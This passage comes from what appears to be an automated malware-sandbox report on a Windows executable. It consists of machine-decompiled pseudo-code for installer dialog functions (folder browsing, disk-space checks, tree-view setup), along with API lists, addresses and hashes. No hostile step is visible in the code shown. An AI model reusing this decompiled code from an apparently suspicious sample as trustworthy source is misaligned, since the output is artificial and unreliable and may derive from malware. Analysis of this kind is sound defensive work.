                                                                                    								_v64 = _t302;
                                                                                    								_v40 = _t318;
                                                                                    								_v68 = _t269 & _t302;
                                                                                    								if((_t269 & 0x00000002) == 0) {
                                                                                    									if((_t269 & 0x00000004) == 0) {
                                                                                    										 *( *0x42a094 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                    									} else {
                                                                                    										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                                                    									}
                                                                                    								} else {
                                                                                    									_v76 = 0x4d;
                                                                                    									_v44 = 1;
                                                                                    									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                                                    									_v28 = 1;
                                                                                    									 *( *0x42a094 + _t318 * 4) = _t274;
                                                                                    									_t288 =  *( *0x42a094 + _t318 * 4);
                                                                                    								}
                                                                                    							}
                                                                                    							_t318 = _t318 + 1;
                                                                                    							_t311 = _v24 + 0x418;
                                                                                    							_v24 = _t311;
                                                                                    						} while (_t318 <  *0x42ec4c);
                                                                                    						if(_v28 != 0) {
                                                                                    							L20:
                                                                                    							if(_v16 != 0) {
                                                                                    								E00403EB8(_v8);
                                                                                    								_t280 = _v32;
                                                                                    								_t315 = 0;
                                                                                    								goto L23;
                                                                                    							} else {
                                                                                    								ShowWindow(_v12, 5);
                                                                                    								E00403EB8(_v12);
                                                                                    								L89:
                                                                                    								return E00403EEA(_a8, _a12, _a16);
                                                                                    							}
                                                                                    						}
                                                                                    						goto L19;
                                                                                    					}
                                                                                    				}
                                                                                    			}


























































                                                                                    0x00404820
                                                                                    0x00404826
                                                                                    0x00404828
                                                                                    0x0040482e
                                                                                    0x00404834
                                                                                    0x00404841
                                                                                    0x0040484a
                                                                                    0x0040484d
                                                                                    0x00404850
                                                                                    0x00404a78
                                                                                    0x00404a7f
                                                                                    0x00404a93
                                                                                    0x00404a81
                                                                                    0x00404a83
                                                                                    0x00404a86
                                                                                    0x00404a87
                                                                                    0x00404a8e
                                                                                    0x00404a8e
                                                                                    0x00404a9f
                                                                                    0x00404aad
                                                                                    0x00404ab0
                                                                                    0x00404ac6
                                                                                    0x00404b3e
                                                                                    0x00404b41
                                                                                    0x00404b43
                                                                                    0x00404b4d
                                                                                    0x00404b5b
                                                                                    0x00404b5b
                                                                                    0x00404b5d
                                                                                    0x00404b67
                                                                                    0x00404b6d
                                                                                    0x00404b8e
                                                                                    0x00404b6f
                                                                                    0x00404b7c
                                                                                    0x00404b7c
                                                                                    0x00404b6d
                                                                                    0x00404b67
                                                                                    0x00000000
                                                                                    0x00404b41
                                                                                    0x00404acb
                                                                                    0x00404ad6
                                                                                    0x00404adb
                                                                                    0x00404ae2
                                                                                    0x00404ae9
                                                                                    0x00404af3
                                                                                    0x00404af3
                                                                                    0x00404af7
                                                                                    0x00404afc
                                                                                    0x00404b01
                                                                                    0x00404b17
                                                                                    0x00404b03
                                                                                    0x00404b03
                                                                                    0x00404b0b
                                                                                    0x00404b12
                                                                                    0x00404b0d
                                                                                    0x00404b0d
                                                                                    0x00404b0d
                                                                                    0x00404b0b
                                                                                    0x00404b1b
                                                                                    0x00404b1d
                                                                                    0x00404b2b
                                                                                    0x00404b2c
                                                                                    0x00404b38
                                                                                    0x00404b3b
                                                                                    0x00404b3b
                                                                                    0x00404afc
                                                                                    0x00000000
                                                                                    0x00404ae9
                                                                                    0x00404acd
                                                                                    0x00404ad4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404b91
                                                                                    0x00404b91
                                                                                    0x00404b98
                                                                                    0x00404c0c
                                                                                    0x00404c13
                                                                                    0x00404c1f
                                                                                    0x00404c1f
                                                                                    0x00404c28
                                                                                    0x00404c2a
                                                                                    0x00404c31
                                                                                    0x00404c34
                                                                                    0x00404c34
                                                                                    0x00404c3a
                                                                                    0x00404c41
                                                                                    0x00404c44
                                                                                    0x00404c44
                                                                                    0x00404c4a
                                                                                    0x00404c50
                                                                                    0x00404c56
                                                                                    0x00404c56
                                                                                    0x00404c63
                                                                                    0x00404db0
                                                                                    0x00404db7
                                                                                    0x00404dd4
                                                                                    0x00404dda
                                                                                    0x00404dec
                                                                                    0x00404dec
                                                                                    0x00000000
                                                                                    0x00404c69
                                                                                    0x00404c6b
                                                                                    0x00404c73
                                                                                    0x00404c77
                                                                                    0x00404c77
                                                                                    0x00404c7f
                                                                                    0x00404cc0
                                                                                    0x00404cc2
                                                                                    0x00404cd2
                                                                                    0x00404cd5
                                                                                    0x00404cda
                                                                                    0x00404ce1
                                                                                    0x00404ce4
                                                                                    0x00404d86
                                                                                    0x00404d8c
                                                                                    0x00404d9a
                                                                                    0x00404dab
                                                                                    0x00404dab
                                                                                    0x00000000
                                                                                    0x00404d9a
                                                                                    0x00404cea
                                                                                    0x00404ced
                                                                                    0x00404cf3
                                                                                    0x00404cf8
                                                                                    0x00404cfa
                                                                                    0x00404cfc
                                                                                    0x00404d02
                                                                                    0x00404d09
                                                                                    0x00404d0e
                                                                                    0x00404d15
                                                                                    0x00404d18
                                                                                    0x00404d18
                                                                                    0x00404d1f
                                                                                    0x00404d2b
                                                                                    0x00404d2f
                                                                                    0x00404d31
                                                                                    0x00404d31
                                                                                    0x00404d21
                                                                                    0x00404d23
                                                                                    0x00404d23
                                                                                    0x00404d51
                                                                                    0x00404d5d
                                                                                    0x00404d6c
                                                                                    0x00404d6c
                                                                                    0x00404d6e
                                                                                    0x00404d71
                                                                                    0x00404d7a
                                                                                    0x00000000
                                                                                    0x00404c81
                                                                                    0x00404c8c
                                                                                    0x00404c8f
                                                                                    0x00404c94
                                                                                    0x00404c96
                                                                                    0x00404c9a
                                                                                    0x00404caa
                                                                                    0x00404cb4
                                                                                    0x00404cb6
                                                                                    0x00404cb9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404c9c
                                                                                    0x00404c9c
                                                                                    0x00404ca2
                                                                                    0x00404ca4
                                                                                    0x00404ca4
                                                                                    0x00404ca5
                                                                                    0x00404ca6
                                                                                    0x00000000
                                                                                    0x00404c9c
                                                                                    0x00404c7f
                                                                                    0x00404c63
                                                                                    0x00404ba0
                                                                                    0x00000000
                                                                                    0x00404bb6
                                                                                    0x00404bc0
                                                                                    0x00404bc5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404bd7
                                                                                    0x00404bdc
                                                                                    0x00404be8
                                                                                    0x00404be8
                                                                                    0x00404bea
                                                                                    0x00404bf9
                                                                                    0x00404bfb
                                                                                    0x00404c02
                                                                                    0x00404c05
                                                                                    0x00000000
                                                                                    0x00404c05
                                                                                    0x00404ba0
                                                                                    0x00404856
                                                                                    0x0040485b
                                                                                    0x00404865
                                                                                    0x00404866
                                                                                    0x0040486f
                                                                                    0x0040487a
                                                                                    0x00404885
                                                                                    0x0040488b
                                                                                    0x00404899
                                                                                    0x004048ae
                                                                                    0x004048b3
                                                                                    0x004048be
                                                                                    0x004048c7
                                                                                    0x004048dc
                                                                                    0x004048ed
                                                                                    0x004048fa
                                                                                    0x004048fa
                                                                                    0x004048ff
                                                                                    0x00404905
                                                                                    0x00404907
                                                                                    0x0040490a
                                                                                    0x0040490f
                                                                                    0x00404914
                                                                                    0x00404916
                                                                                    0x00404916
                                                                                    0x00404936
                                                                                    0x00404936
                                                                                    0x00404938
                                                                                    0x00404939
                                                                                    0x0040493e
                                                                                    0x00404941
                                                                                    0x00404944
                                                                                    0x00404948
                                                                                    0x0040494d
                                                                                    0x00404952
                                                                                    0x00404956
                                                                                    0x0040495b
                                                                                    0x00404960
                                                                                    0x00404962
                                                                                    0x0040496a
                                                                                    0x00404a34
                                                                                    0x00404a47
                                                                                    0x00000000
                                                                                    0x00404970
                                                                                    0x00404973
                                                                                    0x00404976
                                                                                    0x00404979
                                                                                    0x00404979
                                                                                    0x0040497f
                                                                                    0x00404985
                                                                                    0x00404988
                                                                                    0x0040498e
                                                                                    0x0040498f
                                                                                    0x00404994
                                                                                    0x0040499d
                                                                                    0x004049a4
                                                                                    0x004049a7
                                                                                    0x004049aa
                                                                                    0x004049ad
                                                                                    0x004049e9
                                                                                    0x00404a12
                                                                                    0x004049eb
                                                                                    0x004049f8
                                                                                    0x004049f8
                                                                                    0x004049af
                                                                                    0x004049b2
                                                                                    0x004049c1
                                                                                    0x004049cb
                                                                                    0x004049d3
                                                                                    0x004049da
                                                                                    0x004049e2
                                                                                    0x004049e2
                                                                                    0x004049ad
                                                                                    0x00404a18
                                                                                    0x00404a19
                                                                                    0x00404a25
                                                                                    0x00404a25
                                                                                    0x00404a32
                                                                                    0x00404a4d
                                                                                    0x00404a51
                                                                                    0x00404a6e
                                                                                    0x00404a73
                                                                                    0x00404a76
                                                                                    0x00000000
                                                                                    0x00404a53
                                                                                    0x00404a58
                                                                                    0x00404a61
                                                                                    0x00404dee
                                                                                    0x00404e00
                                                                                    0x00404e00
                                                                                    0x00404a51
                                                                                    0x00000000
                                                                                    0x00404a32
                                                                                    0x0040496a

                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 00404819
                                                                                    • GetDlgItem.USER32 ref: 00404826
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404872
                                                                                    • LoadBitmapA.USER32 ref: 00404885
                                                                                    • SetWindowLongA.USER32 ref: 0040489F
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048B3
                                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004048C7
                                                                                    • SendMessageA.USER32(?,00001109,00000002), ref: 004048DC
                                                                                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048E8
                                                                                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048FA
                                                                                    • DeleteObject.GDI32(?), ref: 004048FF
                                                                                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040492A
                                                                                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404936
                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049CB
                                                                                    • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049F6
                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A0A
                                                                                    • GetWindowLongA.USER32 ref: 00404A39
                                                                                    • SetWindowLongA.USER32 ref: 00404A47
                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404A58
                                                                                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B5B
                                                                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BC0
                                                                                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BD5
                                                                                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BF9
                                                                                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C1F
                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404C34
                                                                                    • GlobalFree.KERNEL32 ref: 00404C44
                                                                                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CB4
                                                                                    • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D5D
                                                                                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D6C
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D8C
                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404DDA
                                                                                    • GetDlgItem.USER32 ref: 00404DE5
                                                                                    • ShowWindow.USER32(00000000), ref: 00404DEC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                    • String ID: $M$N
                                                                                    • API String ID: 1638840714-813528018
                                                                                    • Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                                                                    • Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
                                                                                    • Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                                                                    • Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 78%
                                                                                    			E004042C1(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                    				signed int _v8;
                                                                                    				signed int _v12;
                                                                                    				long _v16;
                                                                                    				long _v20;
                                                                                    				long _v24;
                                                                                    				char _v28;
                                                                                    				intOrPtr _v32;
                                                                                    				long _v36;
                                                                                    				char _v40;
                                                                                    				unsigned int _v44;
                                                                                    				signed int _v48;
                                                                                    				CHAR* _v56;
                                                                                    				intOrPtr _v60;
                                                                                    				intOrPtr _v64;
                                                                                    				intOrPtr _v68;
                                                                                    				CHAR* _v72;
                                                                                    				void _v76;
                                                                                    				struct HWND__* _v80;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				intOrPtr _t82;
                                                                                    				long _t87;
                                                                                    				signed char* _t89;
                                                                                    				void* _t95;
                                                                                    				signed int _t96;
                                                                                    				int _t109;
                                                                                    				signed short _t114;
                                                                                    				signed int _t118;
                                                                                    				struct HWND__** _t122;
                                                                                    				intOrPtr* _t138;
                                                                                    				CHAR* _t146;
                                                                                    				unsigned int _t150;
                                                                                    				signed int _t152;
                                                                                    				unsigned int _t156;
                                                                                    				signed int _t158;
                                                                                    				signed int* _t159;
                                                                                    				struct HWND__* _t165;
                                                                                    				struct HWND__* _t166;
                                                                                    				int _t168;
                                                                                    				unsigned int _t197;
                                                                                    
                                                                                    				_t156 = __edx;
                                                                                    				_t82 =  *0x429870;
                                                                                    				_v32 = _t82;
                                                                                    				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x42f000;
                                                                                    				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                    				if(_a8 == 0x40b) {
                                                                                    					E0040546C(0x3fb, _t146);
                                                                                    					E00405E29(_t146);
                                                                                    				}
                                                                                    				_t166 = _a4;
                                                                                    				if(_a8 != 0x110) {
                                                                                    					L8:
                                                                                    					if(_a8 != 0x111) {
                                                                                    						L20:
                                                                                    						if(_a8 == 0x40f) {
                                                                                    							L22:
                                                                                    							_v8 = _v8 & 0x00000000;
                                                                                    							_v12 = _v12 & 0x00000000;
                                                                                    							E0040546C(0x3fb, _t146);
                                                                                    							if(E0040579B(_t185, _t146) == 0) {
                                                                                    								_v8 = 1;
                                                                                    							}
                                                                                    							E00405BC7(0x429068, _t146);
                                                                                    							_t87 = E00405F57(1);
                                                                                    							_v16 = _t87;
                                                                                    							if(_t87 == 0) {
                                                                                    								L30:
                                                                                    								E00405BC7(0x429068, _t146);
                                                                                    								_t89 = E0040574E(0x429068);
                                                                                    								_t158 = 0;
                                                                                    								if(_t89 != 0) {
                                                                                    									 *_t89 =  *_t89 & 0x00000000;
                                                                                    								}
                                                                                    								if(GetDiskFreeSpaceA(0x429068,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                    									goto L35;
                                                                                    								} else {
                                                                                    									_t168 = 0x400;
                                                                                    									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                    									asm("cdq");
                                                                                    									_v48 = _t109;
                                                                                    									_v44 = _t156;
                                                                                    									_v12 = 1;
                                                                                    									goto L36;
                                                                                    								}
                                                                                    							} else {
                                                                                    								_t159 = 0;
                                                                                    								if(0 == 0x429068) {
                                                                                    									goto L30;
                                                                                    								} else {
                                                                                    									goto L26;
                                                                                    								}
                                                                                    								while(1) {
                                                                                    									L26:
                                                                                    									_t114 = _v16(0x429068,  &_v48,  &_v28,  &_v40);
                                                                                    									if(_t114 != 0) {
                                                                                    										break;
                                                                                    									}
                                                                                    									if(_t159 != 0) {
                                                                                    										 *_t159 =  *_t159 & _t114;
                                                                                    									}
                                                                                    									_t159 = E00405701(0x429068) - 1;
                                                                                    									 *_t159 = 0x5c;
                                                                                    									if(_t159 != 0x429068) {
                                                                                    										continue;
                                                                                    									} else {
                                                                                    										goto L30;
                                                                                    									}
                                                                                    								}
                                                                                    								_t150 = _v44;
                                                                                    								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                    								_v44 = _t150 >> 0xa;
                                                                                    								_v12 = 1;
                                                                                    								_t158 = 0;
                                                                                    								__eflags = 0;
                                                                                    								L35:
                                                                                    								_t168 = 0x400;
                                                                                    								L36:
                                                                                    								_t95 = E00404755(5);
                                                                                    								if(_v12 != _t158) {
                                                                                    									_t197 = _v44;
                                                                                    									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                    										_v8 = 2;
                                                                                    									}
                                                                                    								}
                                                                                    								if( *((intOrPtr*)( *0x42e3fc + 0x10)) != _t158) {
                                                                                    									E0040473D(0x3ff, 0xfffffffb, _t95);
                                                                                    									if(_v12 == _t158) {
                                                                                    										SetDlgItemTextA(_a4, _t168, 0x429058);
                                                                                    									} else {
                                                                                    										E00404678(_t168, 0xfffffffc, _v48, _v44);
                                                                                    									}
                                                                                    								}
                                                                                    								_t96 = _v8;
                                                                                    								 *0x42ecc4 = _t96;
                                                                                    								if(_t96 == _t158) {
                                                                                    									_v8 = E0040140B(7);
                                                                                    								}
                                                                                    								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                                                    									_v8 = _t158;
                                                                                    								}
                                                                                    								E00403EA5(0 | _v8 == _t158);
                                                                                    								if(_v8 == _t158 &&  *0x42a08c == _t158) {
                                                                                    									E00404256();
                                                                                    								}
                                                                                    								 *0x42a08c = _t158;
                                                                                    								goto L53;
                                                                                    							}
                                                                                    						}
                                                                                    						_t185 = _a8 - 0x405;
                                                                                    						if(_a8 != 0x405) {
                                                                                    							goto L53;
                                                                                    						}
                                                                                    						goto L22;
                                                                                    					}
                                                                                    					_t118 = _a12 & 0x0000ffff;
                                                                                    					if(_t118 != 0x3fb) {
                                                                                    						L12:
                                                                                    						if(_t118 == 0x3e9) {
                                                                                    							_t152 = 7;
                                                                                    							memset( &_v76, 0, _t152 << 2);
                                                                                    							_v80 = _t166;
                                                                                    							_v72 = 0x42a0a0;
                                                                                    							_v60 = E00404612;
                                                                                    							_v56 = _t146;
                                                                                    							_v68 = E00405BE9(_t146, 0x42a0a0, _t166, 0x429470, _v12);
                                                                                    							_t122 =  &_v80;
                                                                                    							_v64 = 0x41;
                                                                                    							__imp__SHBrowseForFolderA(_t122);
                                                                                    							if(_t122 == 0) {
                                                                                    								_a8 = 0x40f;
                                                                                    							} else {
                                                                                    								__imp__CoTaskMemFree(_t122);
                                                                                    								E004056BA(_t146);
                                                                                    								_t125 =  *((intOrPtr*)( *0x42ec30 + 0x11c));
                                                                                    								if( *((intOrPtr*)( *0x42ec30 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
                                                                                    									E00405BE9(_t146, 0x42a0a0, _t166, 0, _t125);
                                                                                    									if(lstrcmpiA(0x42dbc0, 0x42a0a0) != 0) {
                                                                                    										lstrcatA(_t146, 0x42dbc0);
                                                                                    									}
                                                                                    								}
                                                                                    								 *0x42a08c =  *0x42a08c + 1;
                                                                                    								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                                                    							}
                                                                                    						}
                                                                                    						goto L20;
                                                                                    					}
                                                                                    					if(_a12 >> 0x10 != 0x300) {
                                                                                    						goto L53;
                                                                                    					}
                                                                                    					_a8 = 0x40f;
                                                                                    					goto L12;
                                                                                    				} else {
                                                                                    					_t165 = GetDlgItem(_t166, 0x3fb);
                                                                                    					if(E00405727(_t146) != 0 && E0040574E(_t146) == 0) {
                                                                                    						E004056BA(_t146);
                                                                                    					}
                                                                                    					 *0x42e3f8 = _t166;
                                                                                    					SetWindowTextA(_t165, _t146);
                                                                                    					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                    					_push(1);
                                                                                    					E00403E83(_t166);
                                                                                    					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                    					_push(0x14);
                                                                                    					E00403E83(_t166);
                                                                                    					E00403EB8(_t165);
                                                                                    					_t138 = E00405F57(0xa);
                                                                                    					if(_t138 == 0) {
                                                                                    						L53:
                                                                                    						return E00403EEA(_a8, _a12, _a16);
                                                                                    					} else {
                                                                                    						 *_t138(_t165, 1);
                                                                                    						goto L8;
                                                                                    					}
                                                                                    				}
                                                                                    			}












































                                                                                    0x004042c1
                                                                                    0x004042c7
                                                                                    0x004042cd
                                                                                    0x004042da
                                                                                    0x004042e8
                                                                                    0x004042eb
                                                                                    0x004042f3
                                                                                    0x004042f9
                                                                                    0x004042f9
                                                                                    0x00404305
                                                                                    0x00404308
                                                                                    0x00404376
                                                                                    0x0040437d
                                                                                    0x00404454
                                                                                    0x0040445b
                                                                                    0x0040446a
                                                                                    0x0040446a
                                                                                    0x0040446e
                                                                                    0x00404478
                                                                                    0x00404485
                                                                                    0x00404487
                                                                                    0x00404487
                                                                                    0x00404495
                                                                                    0x0040449c
                                                                                    0x004044a3
                                                                                    0x004044a6
                                                                                    0x004044dd
                                                                                    0x004044df
                                                                                    0x004044e5
                                                                                    0x004044ea
                                                                                    0x004044ee
                                                                                    0x004044f0
                                                                                    0x004044f0
                                                                                    0x0040450c
                                                                                    0x00000000
                                                                                    0x0040450e
                                                                                    0x00404511
                                                                                    0x0040451f
                                                                                    0x00404525
                                                                                    0x00404526
                                                                                    0x00404529
                                                                                    0x0040452c
                                                                                    0x00000000
                                                                                    0x0040452c
                                                                                    0x004044a8
                                                                                    0x004044aa
                                                                                    0x004044ae
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004044b0
                                                                                    0x004044b0
                                                                                    0x004044bd
                                                                                    0x004044c2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004044c6
                                                                                    0x004044c8
                                                                                    0x004044c8
                                                                                    0x004044d3
                                                                                    0x004044d6
                                                                                    0x004044db
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004044db
                                                                                    0x00404538
                                                                                    0x00404542
                                                                                    0x00404545
                                                                                    0x00404548
                                                                                    0x0040454f
                                                                                    0x0040454f
                                                                                    0x00404551
                                                                                    0x00404551
                                                                                    0x00404556
                                                                                    0x00404558
                                                                                    0x00404560
                                                                                    0x00404567
                                                                                    0x00404569
                                                                                    0x00404574
                                                                                    0x00404574
                                                                                    0x00404569
                                                                                    0x00404584
                                                                                    0x0040458e
                                                                                    0x00404596
                                                                                    0x004045b1
                                                                                    0x00404598
                                                                                    0x004045a1
                                                                                    0x004045a1
                                                                                    0x00404596
                                                                                    0x004045b6
                                                                                    0x004045bb
                                                                                    0x004045c0
                                                                                    0x004045c9
                                                                                    0x004045c9
                                                                                    0x004045d2
                                                                                    0x004045d4
                                                                                    0x004045d4
                                                                                    0x004045e0
                                                                                    0x004045e8
                                                                                    0x004045f2
                                                                                    0x004045f2
                                                                                    0x004045f7
                                                                                    0x00000000
                                                                                    0x004045f7
                                                                                    0x004044a6
                                                                                    0x0040445d
                                                                                    0x00404464
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404464
                                                                                    0x00404383
                                                                                    0x0040438c
                                                                                    0x004043a6
                                                                                    0x004043ab
                                                                                    0x004043b5
                                                                                    0x004043bc
                                                                                    0x004043c8
                                                                                    0x004043cb
                                                                                    0x004043ce
                                                                                    0x004043d5
                                                                                    0x004043dd
                                                                                    0x004043e0
                                                                                    0x004043e4
                                                                                    0x004043eb
                                                                                    0x004043f3
                                                                                    0x0040444d
                                                                                    0x004043f5
                                                                                    0x004043f6
                                                                                    0x004043fd
                                                                                    0x00404407
                                                                                    0x0040440f
                                                                                    0x0040441c
                                                                                    0x00404430
                                                                                    0x00404434
                                                                                    0x00404434
                                                                                    0x00404430
                                                                                    0x00404439
                                                                                    0x00404446
                                                                                    0x00404446
                                                                                    0x004043f3
                                                                                    0x00000000
                                                                                    0x004043ab
                                                                                    0x00404399
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040439f
                                                                                    0x00000000
                                                                                    0x0040430a
                                                                                    0x00404317
                                                                                    0x00404320
                                                                                    0x0040432d
                                                                                    0x0040432d
                                                                                    0x00404334
                                                                                    0x0040433a
                                                                                    0x00404343
                                                                                    0x00404346
                                                                                    0x00404349
                                                                                    0x00404351
                                                                                    0x00404354
                                                                                    0x00404357
                                                                                    0x0040435d
                                                                                    0x00404364
                                                                                    0x0040436b
                                                                                    0x004045fd
                                                                                    0x0040460f
                                                                                    0x00404371
                                                                                    0x00404374
                                                                                    0x00000000
                                                                                    0x00404374
                                                                                    0x0040436b

                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 00404310
                                                                                    • SetWindowTextA.USER32(00000000,?), ref: 0040433A
                                                                                    • SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004043F6
                                                                                    • lstrcmpiA.KERNEL32(Fdskdfkdsfsdfdsf,0042A0A0,00000000,?,?), ref: 00404428
                                                                                    • lstrcatA.KERNEL32(?,Fdskdfkdsfsdfdsf), ref: 00404434
                                                                                    • SetDlgItemTextA.USER32 ref: 00404446
                                                                                      • Part of subcall function 0040546C: GetDlgItemTextA.USER32 ref: 0040547F
                                                                                      • Part of subcall function 00405E29: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                                                      • Part of subcall function 00405E29: CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                                                      • Part of subcall function 00405E29: CharNextA.USER32(?,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                                                      • Part of subcall function 00405E29: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                                                    • GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040451F
                                                                                      • Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                                                      • Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
                                                                                      • Part of subcall function 00404678: SetDlgItemTextA.USER32 ref: 00404731
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: A$C:\Users\user\AppData\Local\Temp$Fdskdfkdsfsdfdsf
                                                                                    • API String ID: 2624150263-2549951172
                                                                                    • Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                                                    • Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
                                                                                    • Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                                                    • Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 74%
                                                                                    			E00402053() {
                                                                                    				void* _t44;
                                                                                    				intOrPtr* _t48;
                                                                                    				intOrPtr* _t50;
